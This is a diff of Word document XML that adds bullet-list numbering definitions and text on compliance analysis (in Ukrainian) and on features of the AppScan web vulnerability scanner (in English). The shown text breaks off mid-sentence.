+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
     </w:p>
@@ -23030,6 +26956,119 @@
 <file path=word/numbering.xml><?xml version="1.0" encoding="utf-8"?>
 <w:numbering xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
   <w:abstractNum w:abstractNumId="0">
+    <w:nsid w:val="15E52178"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="A888DA66"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="1">
     <w:nsid w:val="2F5175DD"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="297E440E"/>
@@ -23142,7 +27181,120 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="1">
+  <w:abstractNum w:abstractNumId="2">
+    <w:nsid w:val="35E3142D"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="A888DA66"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3">
     <w:nsid w:val="48577FED"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="CFAEF4BA"/>
@@ -23264,7 +27416,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2">
+  <w:abstractNum w:abstractNumId="4">
     <w:nsid w:val="4B5255B3"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="0442CE44"/>
@@ -23413,7 +27565,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3">
+  <w:abstractNum w:abstractNumId="5">
     <w:nsid w:val="53912F4C"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="53BE25C4"/>
@@ -23562,7 +27714,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4">
+  <w:abstractNum w:abstractNumId="6">
     <w:nsid w:val="54BF63B5"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="31EECCA0"/>
@@ -23675,7 +27827,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5">
+  <w:abstractNum w:abstractNumId="7">
     <w:nsid w:val="599D32D5"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="A888DA66"/>
@@ -23788,7 +27940,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6">
+  <w:abstractNum w:abstractNumId="8">
     <w:nsid w:val="64277235"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="67102D8E"/>
@@ -23901,7 +28053,120 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="7">
+  <w:abstractNum w:abstractNumId="9">
+    <w:nsid w:val="6E2B310E"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="A888DA66"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="360" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="10">
     <w:nsid w:val="7DDD64F0"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="04190021"/>
@@ -24015,28 +28280,37 @@
     </w:lvl>
   </w:abstractNum>
   <w:num w:numId="1">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="2">
+    <w:abstractNumId w:val="10"/>
+  </w:num>
+  <w:num w:numId="3">
+    <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="4">
     <w:abstractNumId w:val="1"/>
   </w:num>
-  <w:num w:numId="2">
-    <w:abstractNumId w:val="7"/>
+  <w:num w:numId="5">
+    <w:abstractNumId w:val="8"/>
   </w:num>
-  <w:num w:numId="3">
+  <w:num w:numId="6">
+    <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="7">
+    <w:abstractNumId w:val="4"/>
+  </w:num>
+  <w:num w:numId="8">
     <w:abstractNumId w:val="5"/>
   </w:num>
-  <w:num w:numId="4">
+  <w:num w:numId="9">
     <w:abstractNumId w:val="0"/>
   </w:num>
-  <w:num w:numId="5">
-    <w:abstractNumId w:val="6"/>
-  </w:num>
-  <w:num w:numId="6">
-    <w:abstractNumId w:val="4"/>
-  </w:num>
-  <w:num w:numId="7">
+  <w:num w:numId="10">
     <w:abstractNumId w:val="2"/>
   </w:num>
-  <w:num w:numId="8">
-    <w:abstractNumId w:val="3"/>
+  <w:num w:numId="11">
+    <w:abstractNumId w:val="9"/>
   </w:num>
 </w:numbering>
 </file>
@@ -25021,7 +29295,7 @@
 </file>
 
 <file path=customXml/itemProps1.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{4395E903-DD3A-45BC-ABA8-21B58D6983CC}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{DF0FBC63-C6ED-4E1F-9A66-6A105C944A9E}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/Bullshit.docx
+++ b/Bullshit.docx
@@ -24438,8 +24438,11 @@
         <w:ind w:left="360" w:firstLine="348"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -24670,68 +24673,946 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>ім того, аналіз на відповідність вимогам регуляторів дозволяє полегшити і спростити процедуру зовнішнього аудиту інфраст</w:t>
+        <w:t>ім того, аналіз на відповідність вимогам регуляторів дозволяє полегшити і спростити процедуру зовнішнього аудиту інфраструктури та інформаційної системи в тому випадку, якщо вимоги є обов'язковими. Наприклад, вимоги PCI DSS обов'язкові для веб-додатків і вбудованого коду, що працює з платіжною інформацією по банківських картах, при цьому проведення зовнішнього аудиту з виконання PCI DSS здійснюється в тому числі з аналізом застосовуваних програмних продукті</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>в</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360" w:firstLine="348"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a3"/>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="0" w:firstLine="348"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>AppScan</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:outlineLvl w:val="1"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Main features in Appscan:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>The Rational Appscan 8.5 Standard edition has many new features, most of which I cover in the brief outline below:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360" w:right="360"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Flash support: Appscan 8.0 has increased flash support compared to its earlier versions. It can now explore and test applications based on an Adobe Flex framework. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>AMF protocol is also supported.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360" w:right="360"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Glass box testing: Glass box scanning is a new feature introduced in Appscan. This process installs an agent on the server which helps find hidden URLs and additional issues.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360" w:right="360"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>Web services scanning: Web service scanning is one area which organizations are looking for a more effective automated support, and Appscan has scored well in this area.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="12"/>
+        </w:numPr>
+        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="360" w:right="360"/>
+        <w:textAlignment w:val="baseline"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Java script security </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t>analyzer :</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Appscan has introduced JavaScript security analyser which analyses the crawled html pages for vulnerabilities and </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="474747"/>
+          <w:sz w:val="28"/>
